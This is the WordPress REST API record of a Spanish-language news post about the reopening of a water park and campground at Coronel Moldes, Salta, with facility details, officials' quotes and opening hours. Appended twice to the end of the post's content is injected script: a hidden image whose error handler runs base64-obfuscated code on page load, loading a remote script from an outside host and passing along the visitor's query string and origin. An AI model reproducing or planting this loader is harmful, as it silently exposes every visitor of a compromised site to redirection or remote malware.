{"id":4423,"date":"2024-09-23T11:16:29","date_gmt":"2024-09-23T14:16:29","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4423"},"modified":"2025-08-13T23:48:26","modified_gmt":"2025-08-14T02:48:26","slug":"reabrio-este-domingo-sus-puertas-el-parque-acuatico-de-coronel-moldes","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4423","title":{"rendered":"Reabri\u00f3 este domingo sus puertas el Parque Acu\u00e1tico de Coronel Moldes"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-c8c4e60d48718417a9a1bf0059da1769\" style=\"background-color:#076fab\"><em>Ni\u00f1os y adultos podr\u00e1n disfrutar desde el domingo de las piletas y los toboganes acu\u00e1ticos<\/em><\/h4>\n\n\n\n<p>Los salte\u00f1os podr\u00e1n disfrutar desde el domingo 22 de septiembre las instalaciones del parque acu\u00e1tico ubicado en el camping El Pr\u00e9stamo en Coronel Moldes. El parque acu\u00e1tico cuenta con un aforo para 400 personas con espacios especiales para ni\u00f1os y adultos con una pileta de m\u00e1s de 40 m de largo por 16 de ancho. Las piletas constan de 8 toboganes acu\u00e1ticos para adultos; adem\u00e1s tambi\u00e9n se puede disfrutar de una plaza de juego; los ni\u00f1os pueden recrearse en juegos de agua con 1 mangrullo, dos hongos y un chorro de agua.<\/p>\n\n\n\n<p>En el predio del Parque El Pr\u00e9stamo y Parque Acu\u00e1tico, enclavado a orillas del dique Cabra Corral, una regi\u00f3n de impresionante belleza natural en el Valle de Lerma, el camping ofrece 35 asadores con sus respectivos techos, un sector para 8 motorhome y 35 carpas.<\/p>\n\n\n\n<p>Adem\u00e1s, el predio cuenta todos los d\u00edas con un restaurante y un drugstore, donde el visitante puede acudir de forma independiente del Parque Acu\u00e1tico y del Camping para degustar la riqueza gastron\u00f3mica de la regi\u00f3n.<\/p>\n\n\n\n<p>El ministro de Turismo y Deportes&nbsp;<strong>Mario Pe\u00f1a<\/strong>&nbsp;se\u00f1al\u00f3 que \u201cpor pedido del gobernador inauguramos el parque acu\u00e1tico en coincidencia con el inicio de la primavera, con todo lo que significa para la zona tener un lugar de excelencia en la temporada de calor para que disfruten visitantes y salte\u00f1os\u201d.<\/p>\n\n\n\n<ul class=\"wp-block-list\"><\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/14006-el-domingo-22-de-septiembre-abre-sus-puertas-el-parque-acuatico-de-coronel-moldes-20240920160729.jpeg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/14006-el-domingo-22-de-septiembre-abre-sus-puertas-el-parque-acuatico-de-coronel-moldes-20240920160729.jpeg\" alt=\"El domingo 22 de septiembre abre sus puertas el Parque Acu\u00e1tico de Coronel Moldes\" style=\"width:320px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>En la apertura se realiz\u00f3 un trabajo en conjunto entre el Ministerio de Turismo y Deportes a trav\u00e9s de la Unidad Coordinadora de Parques Urbanos, la Municipalidad de Coronel Moldes y la C\u00e1mara de Turismo de Cabra Corral.<\/p>\n\n\n\n<p>Por su parte, el intendente de Coronel Moldes&nbsp;<strong>Omar Carrasco<\/strong>&nbsp;destac\u00f3 que \u201cel Parque Acu\u00e1tico del municipio ser\u00e1 el primero en abrir la temporada veraniega en la provincia\u201d. Asimismo, se refiri\u00f3 a la presencia del Colegio San Bernardo de Coronel Moldes disfrutando de las instalaciones, en tanto que ma\u00f1ana lo har\u00e1 el Colegio Puerta de D\u00eda. Carrasco se\u00f1al\u00f3 el beneficio que implica un inicio temprano de la temporada ya que atrae salte\u00f1os y turistas.<\/p>\n\n\n\n<p>Por su parte,&nbsp;<strong>Eleonora Gallardo<\/strong>, Administradora de los Parques Urbanos, invit\u00f3 a visitar el camping y el natatorio, un lugar para la familia, con entradas accesibles para disfrutar y acampar. Asimismo, indic\u00f3 que en 2023 se trabaj\u00f3 intensamente en la recepci\u00f3n de salte\u00f1os y turistas que visitaron las instalaciones.<\/p>\n\n\n\n<p><strong>Horarios<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Parque Acu\u00e1tico: mi\u00e9rcoles a domingo de 11 a 18 h.<\/li>\n\n\n\n<li>Camping: lunes a domingo de 10 a 19 hs con posibilidad de acampe.<\/li>\n\n\n\n<li>Restaurante: todos los d\u00edas de 9 a 22 h.<\/li>\n\n\n\n<li>Drugstore: todos los d\u00edas de 9 a 22 h.<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"560\" height=\"315\" data-id=\"4424\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8388-el-domingo-22-de-septiembre-abre-sus-puertas-el-parque-acuatico-de-coronel-moldes-20240920164720.jpg\" alt=\"\" class=\"wp-image-4424\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8388-el-domingo-22-de-septiembre-abre-sus-puertas-el-parque-acuatico-de-coronel-moldes-20240920164720.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8388-el-domingo-22-de-septiembre-abre-sus-puertas-el-parque-acuatico-de-coronel-moldes-20240920164720-300x169.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"560\" height=\"315\" data-id=\"4425\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8389-el-domingo-22-de-septiembre-abre-sus-puertas-el-parque-acuatico-de-coronel-moldes.jpg\" alt=\"\" class=\"wp-image-4425\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8389-el-domingo-22-de-septiembre-abre-sus-puertas-el-parque-acuatico-de-coronel-moldes.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8389-el-domingo-22-de-septiembre-abre-sus-puertas-el-parque-acuatico-de-coronel-moldes-300x169.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ni\u00f1os y adultos podr\u00e1n disfrutar desde el domingo de las piletas y los toboganes acu\u00e1ticos Los salte\u00f1os podr\u00e1n disfrutar desde el domingo 22 de septiembre las instalaciones del parque acu\u00e1tico ubicado en el camping El Pr\u00e9stamo en Coronel Moldes. El parque acu\u00e1tico cuenta con un aforo para 400 personas con espacios especiales para ni\u00f1os y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4426,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[43],"tags":[],"class_list":{"0":"post-4423","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ambiente-naturaleza"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4423"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4423"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4423\/revisions"}],"predecessor-version":[{"id":6679,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4423\/revisions\/6679"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4426"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4423"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4423"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4423"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}